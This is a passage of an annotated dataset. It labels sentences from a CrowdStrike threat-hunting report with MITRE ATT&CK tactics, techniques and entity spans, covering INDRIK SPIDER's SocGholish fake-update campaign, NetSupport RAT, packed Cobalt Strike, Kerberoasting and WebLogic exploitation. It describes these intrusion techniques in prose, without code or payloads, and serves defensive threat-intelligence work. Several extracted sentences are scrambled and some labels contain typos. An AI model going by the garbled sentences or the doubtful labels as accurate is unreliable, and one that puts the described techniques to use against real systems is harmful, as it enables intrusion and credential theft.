"sentence_id": 241, "context_before": "For more information on how to gain visibility into cybercrime activities, see the CrowdStrike Falcon® Intelligence Recon webpage.", "sentence_text": "For more information on how to protect your external attack surface, see the CrowdStrike Falcon® Surface webpage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s242-c490f8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 242, "context_before": "For more information on how to protect your external attack surface, see the CrowdStrike Falcon® Surface webpage.", "sentence_text": "NOWHERE TO HIDE 21 INDRIK SPIDER BRINGS THE TAILORED EXPERIENCE TO OPPORTUNISTIC ECRIME This year, Falcon OverWatch observed numerous intrusions in which adversaries appeared to cast a wide net across multiple regions and verticals for initial access, then tailored their follow-on tactics, techniques and procedures (TTPs) upon discovering they hit a high-value target.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s243-48b15e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 243, "context_before": "NOWHERE TO HIDE 21 INDRIK SPIDER BRINGS THE TAILORED EXPERIENCE TO OPPORTUNISTIC ECRIME This year, Falcon OverWatch observed numerous intrusions in which adversaries appeared to cast a wide net across multiple regions and verticals for initial access, then tailored their follow-on tactics, techniques and procedures (TTPs) upon discovering they hit a high-value target.", "sentence_text": "Over the past year, INDRIK SPIDER was at the forefront of this trend, tailoring their operations based on characteristics of the compromised host and the victim organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s244-df3c5d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 244, "context_before": "Over the past year, INDRIK SPIDER was at the forefront of this trend, tailoring their operations based on characteristics of the compromised host and the victim organization.", "sentence_text": "This was followed by the use of a malicious JavaScript file that runs discovery commands — in particular, these commands look to see whether the victim host is domain-joined.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" }, { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "malicious file runs discovery dommands", "entities": [ { "text": "malicious JavaScript file", "start": 34, "end": 59, "label": "MalwareTool" }, { "text": "runs discovery commands", "start": 65, "end": 88, "label": "Action" }, { "text": "the victim host", "start": 141, "end": 156, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s245-b1c840", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 245, "context_before": "This was followed by the use of a malicious JavaScript file that runs discovery commands — in particular, these commands look to see whether the victim host is domain-joined.", "sentence_text": "Upon discovering domain-joined hosts, INDRIK SPIDER transitioned from scripted to interactive activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s246-574006", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 246, "context_before": "Upon discovering domain-joined hosts, INDRIK SPIDER transitioned from scripted to interactive activity.", "sentence_text": "In further evidence that the interactive follow-on activity was tailored to the victim organization, Falcon OverWatch discovered that the malicious DLLs deployed to the target victims were environmentally keyed with each targeted organization’s domain name.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s247-5b0737", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 247, "context_before": "In further evidence that the interactive follow-on activity was tailored to the victim organization, Falcon OverWatch discovered that the malicious DLLs deployed to the target victims were environmentally keyed with each targeted organization’s domain name.", "sentence_text": "Phase One: Cast a Wide Net with SocGholish In this ongoing campaign, users who visit a compromised or malicious website with the SocGholish script are served a malicious pop-up, and social engineering and masquerading techniques are used to trick the user into downloading, extracting and executing a JavaScript file known as a Fake Browser Update (FBU).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1059.007", "name": "JavaScript" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "malicious websites activities", "entities": [ { "text": "compromised or malicious website", "start": 87, "end": 119, "label": "MalwareTool" }, { "text": "malicious pop-up", "start": 160, "end": 176, "label": "Action" }, { "text": "social engineering", "start": 182, "end": 200, "label": "Action" }, { "text": "masquerading ", "start": 205, "end": 218, "label": "Action" }, { "text": "extracting and executing", "start": 274, "end": 298, "label": "Action" }, { "text": "Fake Browser Update", "start": 328, "end": 347, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s248-3e5126", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 248, "context_before": "Phase One: Cast a Wide Net with SocGholish In this ongoing campaign, users who visit a compromised or malicious website with the SocGholish script are served a malicious pop-up, and social engineering and masquerading techniques are used to trick the user into downloading, extracting and executing a JavaScript file known as a Fake Browser Update (FBU).", "sentence_text": "Examples of these FBUs include Update.js, Chrome.Update.xxxxxx.js and Edge.js.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s249-cd63ef", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 249, "context_before": "Examples of these FBUs include Update.js, Chrome.Update.xxxxxx.js and Edge.js.", "sentence_text": "Upon execution,18 the FBU conducts multiple scripted19 discovery activities before relaying the data over C2 infrastructure and evaluating the response it receives.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "FBU conducts scripted discovery before relaying data over C2", "entities": [ { "text": "conducts multiple scripted19 discovery", "start": 26, "end": 64, "label": "Action" }, { "text": "relaying the data over C2", "start": 83, "end": 108, "label": "Action" }, { "text": "FBU", "start": 22, "end": 25, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s250-efc0c8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 250, "context_before": "Upon execution,18 the FBU conducts multiple scripted19 discovery activities before relaying the data over C2 infrastructure and evaluating the response it receives.", "sentence_text": "The FBU script delivered by SocGholish retrieves information via various discovery20 techniques and exfiltrates21 this data so that follow-on activity can be executed depending on the response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s251-095af4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 251, "context_before": "The FBU script delivered by SocGholish retrieves information via various discovery20 techniques and exfiltrates21 this data so that follow-on activity can be executed depending on the response.", "sentence_text": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1204/002/.\n19 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1059/.\n20 For more information on this technique, see the MITRE website: https://attack.mitre.org/tactics/TA0007/.\n21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p21-s252-d50c77", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 21, "sentence_id": 252, "context_before": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1204/002/.\n19 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1059/.\n20 For more information on this technique, see the MITRE website: https://attack.mitre.org/tactics/TA0007/.\n21", "sentence_text": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1020/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s253-b6f865", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 253, "context_before": "For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1020/.", "sentence_text": "NOWHERE TO HIDE 22 Phase Two: Identify Victims of Interest The follow-on behavior appeared to be determined by whether or not the affected host was domain-joined — information that was gathered during the initial stages of the intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s254-27a04c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 254, "context_before": "NOWHERE TO HIDE 22 Phase Two: Identify Victims of Interest The follow-on behavior appeared to be determined by whether or not the affected host was domain-joined — information that was gathered during the initial stages of the intrusion.", "sentence_text": "In some instances, Falcon OverWatch observed a NetSupport RAT payload being deployed for remote administration.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "malware payload deployed for remote administration", "entities": [ { "text": "deployed ", "start": 76, "end": 85, "label": "Action" }, { "text": "NetSupport RAT", "start": 47, "end": 61, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s255-bef70f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 255, "context_before": "In some instances, Falcon OverWatch observed a NetSupport RAT payload being deployed for remote administration.", "sentence_text": "In other cases, compromised hosts received a DLL containing a BlisterLoader-packed Cobalt Strike implant.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1027.002", "name": "Software Packing" }, { "id": "T1584.001", "name": "Domains" } ], "procedure": "victims receive a packed dll", "entities": [ { "text": "compromised hosts", "start": 16, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "DLL ", "start": 45, "end": 49, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s256-938e24", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 256, "context_before": "In other cases, compromised hosts received a DLL containing a BlisterLoader-packed Cobalt Strike implant.", "sentence_text": "When NetSupport RAT installation occurred, it was installed almost instantly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s257-b4cf57", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 257, "context_before": "When NetSupport RAT installation occurred, it was installed almost instantly.", "sentence_text": "This indicates the adversary used a set of predefined conditions to determine whether to deploy NetSupport RAT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s258-c8e4a5", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 258, "context_before": "This indicates the adversary used a set of predefined conditions to determine whether to deploy NetSupport RAT.", "sentence_text": "To deploy NetSupport RAT, execution of a PowerShell download cradle occurs to retrieve and execute a script masquerading as an SVG image file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "execution of a powershell and execution of a masquerading script", "entities": [ { "text": "execution of a PowerShell", "start": 26, "end": 51, "label": "Action" }, { "text": "NetSupport RAT", "start": 10, "end": 24, "label": "MalwareTool" }, { "text": "execute a script masquerading", "start": 91, "end": 120, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s259-528238", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 259, "context_before": "To deploy NetSupport RAT, execution of a PowerShell download cradle occurs to retrieve and execute a script masquerading as an SVG image file.", "sentence_text": "The masqueraded script downloads the RAT, sets persistence via the registry run key22 for the current user and executes the RAT using Windows Management Instrumentation (WMI).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" }, { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "script downloads RAT, sets persistence using key and execute RAT using WMI", "entities": [ { "text": "The masqueraded script", "start": 0, "end": 22, "label": "MalwareTool" }, { "text": "downloads ", "start": 23, "end": 33, "label": "Action" }, { "text": "RAT", "start": 37, "end": 40, "label": "MalwareTool" }, { "text": "sets", "start": 42, "end": 46, "label": "Action" }, { "text": "registry run key", "start": 67, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "executes ", "start": 111, "end": 120, "label": "Action" }, { "text": "RAT ", "start": 124, "end": 128, "label": "MalwareTool" }, { "text": "Windows Management Instrumentation", "start": 134, "end": 168, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s260-01c2dc", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 260, "context_before": "The masqueraded script downloads the RAT, sets persistence via the registry run key22 for the current user and executes the RAT using Windows Management Instrumentation (WMI).", "sentence_text": "What Is\nPhase Three: Go Hands-On Environmental In the SocGholish-based intrusions that leveraged a BlisterLoader-packed Cobalt Keying?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s261-ef5e6e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 261, "context_before": "What Is\nPhase Three: Go Hands-On Environmental In the SocGholish-based intrusions that leveraged a BlisterLoader-packed Cobalt Keying?", "sentence_text": "Strike implant, Falcon OverWatch observed a distinct delay between initial access and automated discovery actions, and observed follow-on activity.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "delay between activities", "entities": [ { "text": "delay between initial access and automated discovery actions", "start": 53, "end": 113, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s262-532391", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 262, "context_before": "Strike implant, Falcon OverWatch observed a distinct delay between initial access and automated discovery actions, and observed follow-on activity.", "sentence_text": "This delay is Environmental keying prevents malicious binaries from executing their intended likely due to the transition from automated malicious activity to hands-on-keyboard payload unless they are executing within a activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s263-8c4723", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 263, "context_before": "This delay is Environmental keying prevents malicious binaries from executing their intended likely due to the transition from automated malicious activity to hands-on-keyboard payload unless they are executing within a activity.", "sentence_text": "Falcon OverWatch found that the packed DLLs were environmentally target environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s264-b3738e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 264, "context_before": "Falcon OverWatch found that the packed DLLs were environmentally target environment.", "sentence_text": "This is commonly used keyed23 with each targeted organization’s domain name, leading Falcon OverWatch in targeted intrusions to hinder attempts to to conclude this activity was tailored to the victim.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s265-6417c7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 265, "context_before": "This is commonly used keyed23 with each targeted organization’s domain name, leading Falcon OverWatch in targeted intrusions to hinder attempts to to conclude this activity was tailored to the victim.", "sentence_text": "The environmental keying allowed reverse engineer, sandbox or detect with the resulting payload to be unpacked and executed only in the correct environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s266-b50e7e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 266, "context_before": "The environmental keying allowed reverse engineer, sandbox or detect with the resulting payload to be unpacked and executed only in the correct environment.", "sentence_text": "antivirus (AV) products and hide the tactics and techniques leveraged by the malicious Written DLLs containing the packed Cobalt Strike implant were also named after binary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s267-ffd1d3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 267, "context_before": "antivirus (AV) products and hide the tactics and techniques leveraged by the malicious Written DLLs containing the packed Cobalt Strike implant were also named after binary.", "sentence_text": "the compromised organization in which they were executed or were otherwise found to be masquerading under the name of a third-party security company in One method of environmental keying noted instances where persistence was established.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "malwares were masquerading using legitimate names", "entities": [ { "text": "masquerading", "start": 87, "end": 99, "label": "Action" }, { "text": "the compromised", "start": 0, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "executed ", "start": 48, "end": 57, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s268-4cad3d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 268, "context_before": "the compromised organization in which they were executed or were otherwise found to be masquerading under the name of a third-party security company in One method of environmental keying noted instances where persistence was established.", "sentence_text": "during INDRIK SPIDER-related intrusions is the use of BlisterLoader, which checks During this phase of the intrusions, the threat actor also conducted further for a system’s Active Directory domain discovery activity — including enumerating domain trusts24 and domain controllers name upon executing and immediately and attempting credential access using the cmdkey /list command.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1482", "name": "Domain Trust Discovery" }, { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "INDRIK SPIDER uses BlisterLoader, domain discovery activity and attempt credential access using cmdkey", "entities": [ { "text": "INDRIK SPIDER", "start": 7, "end": 20, "label": "ThreatActor" }, { "text": "the use of BlisterLoader", "start": 43, "end": 67, "label": "Action" }, { "text": "conducted ", "start": 141, "end": 151, "label": "Action" }, { "text": " domain discovery activity", "start": 190, "end": 216, "label": "Action" }, { "text": "credential access using the cmdkey", "start": 331, "end": 365, "label": "Action" }, { "text": "enumerating domain trusts", "start": 229, "end": 254, "label": "Action" }, { "text": "domain controllers", "start": 261, "end": 279, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s269-0b7732", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 269, "context_before": "during INDRIK SPIDER-related intrusions is the use of BlisterLoader, which checks During this phase of the intrusions, the threat actor also conducted further for a system’s Active Directory domain discovery activity — including enumerating domain trusts24 and domain controllers name upon executing and immediately and attempting credential access using the cmdkey /list command.", "sentence_text": "Further terminates if the hash does not match a commands and scripts were also run that directed their output to temporary files hardcoded value.\nfor later exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1074.001", "name": "Local Data Staging" } ], "procedure": "malware termination and direction of data to temporary files", "entities": [ { "text": "terminates ", "start": 8, "end": 19, "label": "Action" }, { "text": "directed their output to temporary files ", "start": 88, "end": 129, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s270-552174", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 270, "context_before": "Further terminates if the hash does not match a commands and scripts were also run that directed their output to temporary files hardcoded value.\nfor later exfiltration.", "sentence_text": "Strike implant to INDRIK SPIDER.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s271-2b99f3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 271, "context_before": "Strike implant to INDRIK SPIDER.", "sentence_text": "Other activity observed during INDRIK SPIDER SocGholish-based intrusions included credential access using SharpChromium, Kerberoasting using Rubeus and SharpRoast, and attempts to block event tracing for Windows to evade defenses.\n22", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" }, { "id": "T1555.003", "name": "Credentials from Web Browsers" }, { "id": "T1562.002", "name": "Disable Windows Event Logging" } ], "procedure": "INDRIK SPIDER actions: credential access, kerberoasting and block ecevt tracing", "entities": [ { "text": "credential access", "start": 82, "end": 99, "label": "Action" }, { "text": "Kerberoasting", "start": 121, "end": 134, "label": "Action" }, { "text": "block event tracing", "start": 180, "end": 199, "label": "Action" }, { "text": "SharpChromium", "start": 106, "end": 119, "label": "MalwareTool" }, { "text": "Rubeus and SharpRoast", "start": 141, "end": 162, "label": "MalwareTool" }, { "text": "INDRIK SPIDER", "start": 31, "end": 44, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s272-11e739", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 272, "context_before": "Other activity observed during INDRIK SPIDER SocGholish-based intrusions included credential access using SharpChromium, Kerberoasting using Rubeus and SharpRoast, and attempts to block event tracing for Windows to evade defenses.\n22", "sentence_text": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1547/001/.\n23", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p22-s273-8e9601", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 22, "sentence_id": 273, "context_before": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1547/001/.\n23", "sentence_text": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1480/001/.\n24 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1482/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s274-e450b0", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 274, "context_before": "For more information on this sub-technique, see the MITRE website: https://attack.mitre.org/techniques/T1480/001/.\n24 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1482/.", "sentence_text": "NOWHERE TO HIDE 23 ACCESS BROKERS ABUSE VULNERABILITIES FOR INITIAL ACCESS Exploitation of public-facing applications is another common theme across both eCrime and targeted intrusion activity this year, observed in over 20% of all interactive intrusions.25 Vulnerabilities in various productivity applications are at the center of this activity.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "access brokers exploit vulnerabilities in public-facing applications to gain initial access", "entities": [ { "text": "ACCESS BROKERS", "start": 19, "end": 33, "label": "ThreatActor" }, { "text": "ABUSE VULNERABILITIES FOR INITIAL ACCESS", "start": 34, "end": 74, "label": "Action" }, { "text": "Exploitation of public-facing applications", "start": 75, "end": 117, "label": "Action" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s275-f2ba17", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 275, "context_before": "NOWHERE TO HIDE 23 ACCESS BROKERS ABUSE VULNERABILITIES FOR INITIAL ACCESS Exploitation of public-facing applications is another common theme across both eCrime and targeted intrusion activity this year, observed in over 20% of all interactive intrusions.25 Vulnerabilities in various productivity applications are at the center of this activity.", "sentence_text": "In many cases, vulnerabilities were patched at the time of exploitation, but those patches had not been applied to the affected services.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s276-745b35", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 276, "context_before": "In many cases, vulnerabilities were patched at the time of exploitation, but those patches had not been applied to the affected services.", "sentence_text": "Productivity applications often sit on the edge of an organization’s infrastructure and can be missed when security controls are enforced across the rest of the environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s277-66e982", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 277, "context_before": "Productivity applications often sit on the edge of an organization’s infrastructure and can be missed when security controls are enforced across the rest of the environment.", "sentence_text": "Without an external attack surface management (EASM) solution,26 defenders can easily lose track of just how many applications and services are exposed externally — increasing the risk of exposure to a vulnerability or chain of vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s278-c43232", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 278, "context_before": "Without an external attack surface management (EASM) solution,26 defenders can easily lose track of just how many applications and services are exposed externally — increasing the risk of exposure to a vulnerability or chain of vulnerabilities.", "sentence_text": "Given the scale at which vulnerabilities are disclosed, it is unsurprising that many organizations struggle to keep up with timely remediation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s279-9feac3", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 279, "context_before": "Given the scale at which vulnerabilities are disclosed, it is unsurprising that many organizations struggle to keep up with timely remediation.", "sentence_text": "For this reason, defenders need to look beyond the Common Vulnerabilities and Exposures (CVEs) and ensure post-exploitation activity can be quickly identified and effectively controlled.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s280-d1a85c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 280, "context_before": "For this reason, defenders need to look beyond the Common Vulnerabilities and Exposures (CVEs) and ensure post-exploitation activity can be quickly identified and effectively controlled.", "sentence_text": "The ability to readily identify malicious follow-on activity within an environment is also an effective control against unpatched or undisclosed vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s281-e09f51", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 281, "context_before": "The ability to readily identify malicious follow-on activity within an environment is also an effective control against unpatched or undisclosed vulnerabilities.", "sentence_text": "Since early 2023, a series of compromises involving Oracle WebLogic Server (WLS) were associated with Java Network Discovery Interface (JNDI) injection via CVE-2023-21839.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "JNDI injection", "entities": [ { "text": "Oracle WebLogic Server", "start": 52, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "injection via CVE-2023-21839", "start": 142, "end": 170, "label": "Action" }, { "text": "Java Network Discovery Interface (JNDI) injection", "start": 102, "end": 151, "label": "Infrastructure_Indicator" }, { "text": " ", "start": 134, "end": 135, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s282-03a964", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 282, "context_before": "Since early 2023, a series of compromises involving Oracle WebLogic Server (WLS) were associated with Java Network Discovery Interface (JNDI) injection via CVE-2023-21839.", "sentence_text": "This activity aligned with either opportunistic eCrime activity using a publicly available exploit or an independently developed exploit variant associated with suspected China-nexus targeted intrusion activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s283-09eb31", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 283, "context_before": "This activity aligned with either opportunistic eCrime activity using a publicly available exploit or an independently developed exploit variant associated with suspected China-nexus targeted intrusion activity.", "sentence_text": "This variant was observed in historic WLS activity targeting a different vulnerable Java object than those publicly known.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s284-037e6d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 284, "context_before": "This variant was observed in historic WLS activity targeting a different vulnerable Java object than those publicly known.", "sentence_text": "Based on these observations, been repeatedly exploited in the wild since late February 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s285-5d1c81", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 285, "context_before": "Based on these observations, been repeatedly exploited in the wild since late February 2023.", "sentence_text": "25 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1190/.\n26", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p23-s286-0151dd", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 23, "sentence_id": 286, "context_before": "25 For more information on this technique, see the MITRE website: https://attack.mitre.org/techniques/T1190/.\n26", "sentence_text": "For more information, see https://www.crowdstrike.com/products/security-and-it-operations/falcon-surface/.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p24-s287-dbef68", "source": "crowdstrike", "doc_id": 